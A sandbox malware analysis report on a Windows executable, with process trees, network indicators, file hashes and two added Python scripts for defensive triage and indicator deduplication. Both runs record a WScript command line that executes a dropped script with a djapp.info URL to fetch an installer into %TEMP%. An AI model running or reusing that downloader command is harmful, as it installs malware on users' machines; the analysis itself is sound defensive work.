Analysis Overview
SHA256
4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158
Threat Level: Likely malicious
The file a3578237b4c2099fce51877bea51b575_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 01:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 01:21
Reported
2024-06-13 01:24
Platform
win7-20240611-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe (recorded 11 times) | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe (5 processes, all with the identical command line below)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 564
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf7407.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm
| MD5 | 5067c4137d0e2aeb04b2cb6d571ba641 |
| SHA1 | ae7e5dc6130660a82c32932526491586a8072f02 |
| SHA256 | 3a4d899793104023406b6174b2871fd296b1751f8c60b386d0dfe136b25e5edf |
| SHA512 | 5f33490e0991efee176996984312293a633ea9b13bcb181a4ce33615df2eb3cb0b352e9045aced44eeaca1622d13377c93302988c5937cf80a3b5b83c09e68c1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\A7BJXE3M.txt
| MD5 | 64561c88285ad436baf71e2e91b740bf |
| SHA1 | a6c2177ad4b561ce3028e9fd4128539e7c68ee9b |
| SHA256 | 9a29c2ebe009768b833991c7fa12e345362ece90248e2f4a6aec98084d2ec064 |
| SHA512 | b97d8bcc6eeea7a1fcdff5f88552beaa2f9da8132d370187fc5e29b87649f2f6336794e16d9862ce416e72cb4f92b1a848392acd5ef70be49fc1412bb36e30f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 6a46bf7e6fa04e15c2a5dddc3f1931d0 |
| SHA1 | 6124fa99b0ec157864a8e4911a29fc53604c5633 |
| SHA256 | a41f8b4c6f68a74991522e8c2057213e640ca5831f63b949ef93d1c131de5ae7 |
| SHA512 | 41208e38a0c3e9b215e207f241f2841082749df7b4f52a7111a376ff2d2ded30ff9875c84ff0da9929bb2c5cb9c92b3a45ce8d170904f32c3d03618ae0eebbd9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d3049f1a4b143f13261e38abab901109 |
| SHA1 | 1810917619ef7b98f40697c12f35a75575665f8f |
| SHA256 | 69df6863aa24aedecf107a7e2e0353d592c52a5905cc2833d824c2298733e9d6 |
| SHA512 | 6af844057e960d6f4165f297891b676492281fc4abdd7346a220b1972124fabe2a9e0f7b3825c9f67c1ed885262cf6fb994c4dcd607c1981005291a240b6e958 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38a1b67e0dd6526f808692eaba428abd |
| SHA1 | 270c1640da5ec34669e10e9690ad2625dff6300d |
| SHA256 | f8a8a254316502d07a90b14a873a1dabd062d70aadf76ef63a963388e54af01d |
| SHA512 | 645bbc173ad4bf641f9e1add5bbf4a6eafc3f7e26ee89acfa32feb6ff5b3fd5f6765aef7769cca21d973b0c32119f6ccc54b7ec14652a24a1bab9d5364fe80a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 46444726cc859076c5eed090517a4527 |
| SHA1 | 2ec3da28deed6cae47594c55491792ebf8eb5fca |
| SHA256 | 4eed62c9756e937aba86ab57e266546e0f2866ee7d5119a3e5d36d117f2b3f3c |
| SHA512 | 192c3e8fa4662057e6362b5cd8cc782f2d9d6e161550fe1baf63299245613b0262eaacbaecf32709f305b00f85eee6f3871b8a73e7d34ce8794bf31fa7194afc |
C:\Users\Admin\AppData\Local\Temp\CabBC4D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm
| MD5 | 3c14c10590e27ed2a6c28705c2d45f1f |
| SHA1 | b56dd816b0d87d2cbf93ddcfe347ad1a66ec7962 |
| SHA256 | 810a202a398e826b570c86bccb7db6772c384120d7b0fb7416796abd0ccf580f |
| SHA512 | 61462ae6eb1fbf3b64d7b63911423edeef77be074a9a8d32502926a89386fa65147679666ad2b5c58ad5305e1c311ff39c8b2e3e303e716a7cb5cb79c5be74b4 |
C:\Users\Admin\AppData\Local\Temp\TarD4DD.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm
| MD5 | 2fc1dcca1ae8f276fc0d88752492998e |
| SHA1 | 45dd4baeabd9e9cef6614bf6d26a3361846dcd1b |
| SHA256 | 1bd8aca8681cfdeff42acc5353afccf2037ca40d36e5b6fd99cbe3be7dd07e1e |
| SHA512 | eab0e5b3bbcac77dc126549255108da13dc0252f22a5cc41e26862ff6d01cc51b9879ff0551e5ca48f609bb047c34f408b1aa207c8e115f8035ab402e2201917 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm
| MD5 | 4025bb9bae0273b2d30376026dbbd1d3 |
| SHA1 | ecdbc036d96efad52d3f96eeaf1ae8fb7f2170e1 |
| SHA256 | bfcc4c3011dd726b0d01243fba3219680e6cd6fb788846826854b265720dff58 |
| SHA512 | edc6651494cd77c92cd27434ed1c4eb981847dec9d4a9683e57d82b983959356a1adbc67d622d3f9f49df9643b4623d5f7d1b937449013b53941b9cb3cdbbcff |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 01:21
Reported
2024-06-13 01:24
Platform
win10v2004-20240508-en
Max time kernel
100s
Max time network
90s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe (5 processes, all with the identical command line below)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3712 -ip 3712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 1452
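The WScript.exe entries in behavioral1 and behavioral2 carry the same command line apart from the randomised fuf*.js / fuf*.exe names, and the WerFault.exe entries record which process crashed. The Python below is an added example, not part of the report or of the sample: it pulls the script path, the URL with its query parameters and the %TEMP% staging path out of the recorded command lines, flags the mismatch between the System32 path in the command line and the SysWOW64 image actually running (WoW64 file-system redirection, which means the parent that spawned WScript.exe is a 32-bit process), and extracts the crashed PID from the WerFault.exe arguments. The command lines are copied verbatim from the two runs; the heuristics and their wording are this example's own.

```python
"""Command-line triage for the process trees recorded in behavioral1 and behavioral2.

Added example, not part of the sandbox report. The command lines are copied from the
report; the scoring rules and the WoW64 check are this example's own heuristics.
"""
import re
from urllib.parse import parse_qs, urlsplit

SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
TEMP_DIR = "\\appdata\\local\\temp\\"   # compared case-insensitively below

# URL exactly as recorded; only the fuf* stem differs between the two runs.
URL = ("http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80"
       "&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEm"
       "XdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF")


def wscript_cmdline(stem):
    """Rebuild the recorded WScript.exe command line for a given random fuf* stem."""
    return (rf'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\{stem}.js" '
            + URL + rf' C:\Users\Admin\AppData\Local\Temp\{stem}.exe')


WSCRIPT_B1 = wscript_cmdline("fuf7407")   # behavioral1 (win7)
WSCRIPT_B2 = wscript_cmdline("fuf4DB2")   # behavioral2 (win10)


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths whole.
    (shlex in POSIX mode would strip the backslashes, so a small regex is used.)"""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def triage_script_host(cmdline, image_path):
    """What a WScript/CScript command line reveals: script, URL + query parameters,
    any .exe staging path in %TEMP%, and a list of findings explaining the verdict."""
    tokens = split_cmdline(cmdline)
    invoked, args = tokens[0], tokens[1:]
    script = next((t for t in args if t.lower().endswith(SCRIPT_EXTS)), None)
    urls = [t for t in args if re.match(r"https?://", t, re.I)]
    temp_exes = [t for t in args if t.lower().endswith(".exe") and TEMP_DIR in t.lower()]

    findings = []
    if script and TEMP_DIR in script.lower():
        findings.append("script host runs a script dropped in %TEMP%")
    if urls:
        findings.append("URL passed to the script on the command line")
    if temp_exes:
        findings.append(".exe path in %TEMP% passed to the script (staging location)")
    # Command line names System32\WScript.exe but the running image is SysWOW64\WScript.exe:
    # WoW64 file-system redirection, so the parent that called CreateProcess is 32-bit.
    if (invoked.lower().startswith("c:\\windows\\system32\\")
            and image_path.lower().startswith("c:\\windows\\syswow64\\")):
        findings.append("System32 path redirected to SysWOW64: 32-bit parent process")

    params = {k: v[0] for k, v in parse_qs(urlsplit(urls[0]).query).items()} if urls else {}
    return {"script": script, "url": urls[0] if urls else None, "params": params,
            "staging_exe": temp_exes[0] if temp_exes else None, "findings": findings}


def werfault_crashed_pid(cmdline):
    """PID of the crashed process from a WerFault.exe command line (the -p <pid> switch;
    -pss is a different switch and must not match)."""
    m = re.search(r"(?:^|\s)-p\s+(\d+)", cmdline)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    for label, cmd in (("behavioral1", WSCRIPT_B1), ("behavioral2", WSCRIPT_B2)):
        r = triage_script_host(cmd, r"C:\Windows\SysWOW64\WScript.exe")
        print(label, r["script"], "->", r["staging_exe"])
        print("  domain=%s ip=%s pub_id=%s setup_id=%s" % tuple(
            r["params"].get(k) for k in ("domain", "ip", "pub_id", "setup_id")))
        for f in r["findings"]:
            print("  -", f)
    print("crashed PIDs:",
          werfault_crashed_pid(r"C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 564"),
          werfault_crashed_pid(r"C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3712 -ip 3712"))
```

The same four findings fire for both runs, which is the point of comparing them: the randomised file stem and the different crashed PIDs are run-specific noise, while the interpreter, the %TEMP% script, the URL parameters and the staging path are the stable features a detection should key on.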
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
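Across the two runs the Network tables mix three kinds of traffic: DNS to the sandbox resolver 8.8.8.8, connections to bi.downthat.com on two different IPs, and HTTPS to www.hugedomains.com, whose domain_profile[1].htm pages are what ended up in the Temporary Internet Files cache. www.djapp.info, the host named in the WScript.exe command line, is looked up in both runs (six times in behavioral2) but never connected to. The Files tables show the dropped script is byte-identical in both runs (the same SHA256 under the names fuf7407.js and fuf4DB2.js), while the cached HTML differs between runs. The Python below is an added example, not part of the report: it collapses both runs into deduplicated indicators, separates domains that were only queried from those actually contacted, and groups files by hash. Treating the resolver and the HugeDomains traffic as context rather than indicators is this example's own judgement, and reading the hugedomains.com content as a domain-marketplace landing page is an inference from the cached file names, not something the report states.

```python
"""Consolidate the Network and Files tables of behavioral1 and behavioral2 into a
deduplicated indicator list.

Added example, not part of the sandbox report. Rows are copied from the report with
repeated identical rows collapsed; the classification of 8.8.8.8 (the analysis VM's
resolver) and www.hugedomains.com (domain marketplace, source of the cached
domain_profile[1].htm pages) as context rather than indicators is an assumption.
"""
from collections import defaultdict

SANDBOX_RESOLVER = "8.8.8.8"                 # assumption: sandbox DNS, not an indicator
CONTEXT_DOMAINS = {"www.hugedomains.com"}    # assumption: parking/marketplace traffic

# (run, destination, domain, proto) from the two Network tables.
NETWORK = [
    ("behavioral1", "8.8.8.8:53", "www.djapp.info", "udp"),
    ("behavioral1", "8.8.8.8:53", "bi.downthat.com", "udp"),
    ("behavioral1", "3.18.7.81:80", "bi.downthat.com", "tcp"),
    ("behavioral1", "8.8.8.8:53", "www.hugedomains.com", "udp"),
    ("behavioral1", "104.26.6.37:443", "www.hugedomains.com", "tcp"),
    ("behavioral1", "3.94.41.167:80", "bi.downthat.com", "tcp"),
    ("behavioral2", "8.8.8.8:53", "www.djapp.info", "udp"),
    ("behavioral2", "8.8.8.8:53", "8.8.8.8.in-addr.arpa", "udp"),
    ("behavioral2", "8.8.8.8:53", "bi.downthat.com", "udp"),
]

IE_CACHE = r"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5"

# (run, path, sha256) for the dropped script and the cached pages, from the Files tables.
FILES = [
    ("behavioral1", r"C:\Users\Admin\AppData\Local\Temp\fuf7407.js",
     "a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e"),
    ("behavioral2", r"C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js",
     "a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e"),
    ("behavioral1", IE_CACHE + r"\A8DU897P\domain_profile[1].htm",
     "3a4d899793104023406b6174b2871fd296b1751f8c60b386d0dfe136b25e5edf"),
    ("behavioral1", IE_CACHE + r"\A8DU897P\domain_profile[1].htm",
     "1bd8aca8681cfdeff42acc5353afccf2037ca40d36e5b6fd99cbe3be7dd07e1e"),
    ("behavioral1", IE_CACHE + r"\Z5LT06Y3\domain_profile[1].htm",
     "810a202a398e826b570c86bccb7db6772c384120d7b0fb7416796abd0ccf580f"),
    ("behavioral1", IE_CACHE + r"\Z5LT06Y3\domain_profile[1].htm",
     "bfcc4c3011dd726b0d01243fba3219680e6cd6fb788846826854b265720dff58"),
]


def resolved_ips(rows):
    """domain -> set of IPs that were actually connected to over TCP."""
    out = defaultdict(set)
    for _run, dest, domain, proto in rows:
        ip, _port = dest.rsplit(":", 1)
        if proto == "tcp":
            out[domain].add(ip)
    return dict(out)


def dns_only(rows):
    """Domains looked up at the resolver but never connected to (failed resolution,
    or the connection was not observed); reverse lookups are excluded."""
    queried = {d for _r, dest, d, p in rows
               if p == "udp" and dest.startswith(SANDBOX_RESOLVER + ":")}
    return sorted(d for d in queried - set(resolved_ips(rows))
                  if not d.endswith(".in-addr.arpa"))


def indicators(rows):
    """Domains and IPs worth blocking or hunting, minus resolver and context noise."""
    domains = {d for _r, _dest, d, _p in rows if not d.endswith(".in-addr.arpa")}
    ips = resolved_ips(rows)
    return {"domains": sorted(domains - CONTEXT_DOMAINS),
            "ips": sorted(ip for d, s in ips.items() if d not in CONTEXT_DOMAINS for ip in s)}


def same_artifact_across_runs(files):
    """sha256 -> paths: one hash under several names is a single artifact renamed."""
    by_hash = defaultdict(set)
    for _run, path, sha in files:
        by_hash[sha].add(path)
    return {sha: sorted(p) for sha, p in by_hash.items() if len(p) > 1}


def volatile_paths(files):
    """path -> hashes: one path with several hashes is dynamic (per-fetch) content."""
    by_path = defaultdict(set)
    for _run, path, sha in files:
        by_path[path].add(sha)
    return {p: sorted(h) for p, h in by_path.items() if len(h) > 1}


if __name__ == "__main__":
    print("contacted:", resolved_ips(NETWORK))
    print("queried only:", dns_only(NETWORK))
    print("indicators:", indicators(NETWORK))
    print("same artifact, different names:", same_artifact_across_runs(FILES))
    print("same path, different content:", list(volatile_paths(FILES)))
```

The result is two indicator domains (bi.downthat.com with its two IPs, and www.djapp.info with none), one stable dropped artifact to pivot on by hash, and a reminder that the cached HTML hashes are per-fetch and not useful as indicators.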